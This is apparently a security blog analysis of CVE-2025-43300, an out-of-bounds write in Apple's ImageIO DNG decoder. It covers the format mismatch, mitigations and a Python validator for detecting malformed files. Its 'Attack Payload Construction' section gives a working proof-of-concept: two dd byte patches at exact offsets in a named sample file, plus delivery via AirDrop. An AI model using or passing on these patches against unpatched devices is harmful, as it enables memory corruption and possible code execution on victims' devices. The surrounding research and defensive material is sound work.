August 25, 2025

iOS 18.6.1 DNG Vulnerability Deep Dive (CVE-2025-43300)

In-depth analysis of a zero-day vulnerability in Apple's ImageIO framework, detailing the DNG file format, the JPEG lossless decompression mechanism, and how a two-byte modification can trigger an out-of-bounds write. It includes a complete technical analysis covering the vulnerability principle, memory mechanism, attack payload construction, and protective measures.

Vulnerability Overview

CVE ID: CVE-2025-43300
CVSS Score: 8.8 (High)
Vulnerability Type: Out-of-bounds Write
Affected Component: Apple ImageIO framework
Affected Versions: iOS 18.6.1 and earlier, macOS Sonoma 14.7.7 and earlier
Fixed Versions: iOS 18.6.2, macOS Sonoma 14.7.8, macOS Sequoia 15.6.1

Apple officially confirmed that this vulnerability has been used in "extremely sophisticated attacks" targeting specific individuals. Processing malicious image files may lead to memory corruption and arbitrary code execution.

Technical Background

DNG File Format Architecture

DNG (Digital Negative) is an open RAW image format developed by Adobe, essentially an enhanced TIFF container. DNG files use a hierarchical structure:

  • TIFF Container Layer: Contains image metadata, directory structure (IFD), and subdirectories (SubIFD)
  • JPEG Compression Layer: RAW image data is stored using the JPEG lossless compression algorithm
  • Metadata System: The TIFF tag system controls image parsing parameters

JPEG Lossless Compression Mechanism

JPEG lossless compression uses the SOF3 (Start of Frame 3) marker to define the image structure:

SOF3 Marker Structure:

  • Marker ID: 0xFFC3
  • Length Field: 2 bytes
  • Precision: Usually 8 or 16 bits
  • Image height and width
  • Component Count: Defines the number of color components (key field)
  • Sampling factor for each component

SamplesPerPixel TIFF Tag:

  • Tag ID: 277 (0x115)
  • Defines the number of color components per pixel
  • Used for memory allocation and buffer calculation

Vulnerability Location Analysis

The vulnerability is located in the JPEG lossless decompression implementation within Apple's ImageIO framework, specifically within the RawCamera.bundle component. This component is responsible for handling various camera RAW formats, including the JPEG lossless compressed data of DNG files.

Because symbols are stripped, the exact function call path is difficult to trace, but the trigger point lies in the boundary-check logic around component buffer allocation and data writing.

Vulnerability Trigger Mechanism Details

Key Byte Modification Analysis

First Modification (0x2FD00): SamplesPerPixel field

```text
Original Value: 01 (1 component/pixel)
Modified Value: 02 (2 components/pixel)
```

This modification tells the TIFF parser that each pixel contains 2 color components, so the system allocates a processing buffer sized for 2 components.

Second Modification (0x3E40B): SOF3 component count

```text
Original Value: 02 (2 components)
Modified Value: 01 (1 component)
```

This modification tells the JPEG decoder that only 1 color component's data needs to be processed.

Metadata Mismatch Mechanism

These two modifications create a fatal metadata mismatch:

  1. Buffer Allocation Phase: The system allocates memory space for 2 components based on SamplesPerPixel=2
  2. Data Processing Phase: The JPEG decoder, based on SOF3 component count=1, considers that only 1 component needs to be processed
  3. Out-of-bounds Access: When the system attempts to access the data of the second component, an out-of-bounds write occurs

Code Path Differences

Not all DNG files will trigger this vulnerability; specific conditions must be met:

  • Using JPEG lossless compression (SOF3 marker)
  • Containing specific SubIFD structures
  • Generated by specific cameras or tools

DNG files generated using standard tools such as Adobe DNG Converter or dnglab usually will not reach the vulnerable code path.

Memory Mechanism Deep Analysis

Heap Memory Allocation Strategy

The ImageIO framework uses dynamic memory allocation when processing DNG files:

  1. Metadata Parsing: Reads TIFF tags to determine image parameters
  2. Buffer Allocation: Calculates the required memory size based on SamplesPerPixel
  3. JPEG Decoding: Initializes the decoder and allocates component buffers
  4. Data Writing: Processes color component data one by one

Missing Boundary Check

The key problem lies in the lack of buffer boundary checks:

```c
// Pseudocode example (illustrative, not the actual ImageIO code)
int samples_per_pixel = tiff_get_samples_per_pixel();  // TIFF tag 277, value is 2
int jpeg_components   = sof3_get_component_count();    // SOF3 component count, value is 1

// Allocate the buffer based on the TIFF tag
uint8_t *buffer = allocate_buffer(width * height * samples_per_pixel);

// JPEG decoder processing - missing boundary check: the component index is
// never checked against the buffer it writes into, and jpeg_components is
// never cross-validated against samples_per_pixel
for (int i = 0; i < jpeg_components + extra_access; i++) {
    write_component_data(buffer + i * component_size, data);  // Out-of-bounds write
}
```

Memory Corruption Impact

Out-of-bounds writes may affect:

  • Adjacent heap memory blocks
  • Memory management structures (such as malloc metadata)
  • Virtual function table pointers of other objects
  • Important system data structures

Attack Payload Construction

POC Construction Steps

Based on the researcher's provided method:

  1. Obtain a basic DNG file:

    Download address: https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/2771457523
  2. Precise byte modification:

    ```bash
    cp sample.dng modified.dng

    # Modify SamplesPerPixel (position 0x2FD00)
    printf '\x02' | dd of=modified.dng bs=1 seek=$((0x2FD00)) conv=notrunc

    # Modify SOF3 component count (position 0x3E40B)
    printf '\x01' | dd of=modified.dng bs=1 seek=$((0x3E40B)) conv=notrunc
    ```
  3. Trigger the vulnerability:

    • Send via AirDrop to iOS device
    • Open in the Photos app
    • Or load through other image processing applications

Attack Vector Characteristics

High Concealment: The modified file can still be displayed normally in most viewers
Easy Propagation: Can be spread through various channels (social media, email, etc.)
Difficult Detection: Requires in-depth file format analysis to detect anomalies
Wide Impact: Affects all unpatched iOS and macOS devices

Protective Measures and Repair Analysis

Apple Official Fix

Apple implemented "improved boundary checks" in the affected systems:

  • Strengthened cross-validation of TIFF tags and JPEG markers
  • Added boundary checks before accessing component buffers
  • Improved the security of memory allocation and release

General Protection Strategies

For developers:

  1. Input Validation: Strictly validate all fields of the file format
  2. Boundary Checks: Perform boundary validation before all buffer accesses
  3. Cross-Validation: Verify consistency between different data sources
  4. Secure Allocation: Use secure memory allocation and access patterns

For users:

  1. Prompt Updates: Install security updates immediately
  2. Careful Handling: Avoid opening images from unknown sources
  3. Isolated Environment: Handle suspicious files in a secure environment

Detection and Defense

System administrators can consider:

  • Deploying file format validation tools
  • Monitoring abnormal memory access patterns
  • Implementing application sandbox restrictions
  • Using static analysis tools to check for similar vulnerabilities
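A file format validation check of the kind listed above, implementing the cross-validation of the SamplesPerPixel tag (277) against the SOF3 component count that the Apple fix and the mismatch mechanism sections describe. This is an added example, not code from the page or from Apple: it assumes single-value SHORT/LONG IFD entries, strip-based (not tiled) storage, and a constructed minimal TIFF as input.

```python
import struct

COMPRESSION, STRIP_OFFSETS, SAMPLES_PER_PIXEL, STRIP_BYTE_COUNTS, SUB_IFDS = 259, 273, 277, 279, 330
JPEG, SOF3, SOS = 7, 0xC3, 0xDA

def read_ifd(data, off, e):
    """One IFD -> ({tag: value}, next_ifd_offset); only count-1 SHORT/LONG entries are decoded."""
    tags, n = {}, struct.unpack_from(e + "H", data, off)[0]
    for i in range(n):
        tag, typ, cnt, raw = struct.unpack_from(e + "HHI4s", data, off + 2 + 12 * i)
        if cnt == 1 and typ in (3, 4):        # SHORT is left-justified inside the 4-byte field
            tags[tag] = struct.unpack_from(e + ("H" if typ == 3 else "I"), raw)[0]
    return tags, struct.unpack_from(e + "I", data, off + 2 + 12 * n)[0]

def sof3_components(jpeg):
    """Walk marker segments after SOI until SOS; return Nf from the SOF3 header, or None."""
    pos = 2 if jpeg[:2] == b"\xff\xd8" else len(jpeg)
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker == SOF3:                     # FF C3, Lf(2), P(1), Y(2), X(2), Nf(1)
            return jpeg[pos + 9] if pos + 9 < len(jpeg) else None
        if marker == SOS:
            break
        pos += 2 + struct.unpack_from(">H", jpeg, pos + 2)[0]
    return None

def check_dng(data):
    """Return [(ifd_offset, samples_per_pixel, sof3_components)] for every mismatching IFD/SubIFD."""
    e = {b"II": "<", b"MM": ">"}[data[:2]]
    todo, findings = [struct.unpack_from(e + "I", data, 4)[0]], []
    while todo:
        off = todo.pop()
        tags, nxt = read_ifd(data, off, e)
        todo += [o for o in (nxt, tags.get(SUB_IFDS)) if o]   # follow the IFD chain and SubIFD
        if tags.get(COMPRESSION) != JPEG or STRIP_OFFSETS not in tags:
            continue
        strip = data[tags[STRIP_OFFSETS]:tags[STRIP_OFFSETS] + tags[STRIP_BYTE_COUNTS]]
        spp, nf = tags.get(SAMPLES_PER_PIXEL, 1), sof3_components(strip)
        if nf is not None and nf != spp:
            findings.append((off, spp, nf))
    return findings

def build_sample(spp, nf):
    """Constructed minimal little-endian TIFF with one lossless-JPEG strip (not a real camera file)."""
    jpeg = b"\xff\xd8\xff\xc3" + struct.pack(">HBHHB", 8 + 3 * nf, 16, 4, 4, nf)
    jpeg += bytes(b for i in range(nf) for b in (i + 1, 0x11, 0)) + b"\xff\xda\x00\x02\xff\xd9"
    entries = [(COMPRESSION, 3, JPEG), (STRIP_OFFSETS, 4, 62), (SAMPLES_PER_PIXEL, 3, spp), (STRIP_BYTE_COUNTS, 4, len(jpeg))]
    ifd = struct.pack("<H", len(entries)) + b"".join(
        struct.pack("<HHI", t, typ, 1) + struct.pack("<H2x" if typ == 3 else "<I", v) for t, typ, v in entries)
    return b"II*\0" + struct.pack("<I", 8) + ifd + struct.pack("<I", 0) + jpeg  # IFD is 54 bytes, strip at 62
```

`check_dng(build_sample(2, 1))` reports the IFD at offset 8 with SamplesPerPixel=2 against an SOF3 component count of 1, the exact mismatch this page describes; a consistent file returns an empty list.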

Disclaimer: This analysis is for security research and protection purposes only. Do not use the related technology for malicious attacks or illegal activities.

Last updated: August 25, 2025
iOS 18.6.1 DNG Vulnerability Deep Dive (CVE-2025-43300) - ICTRUN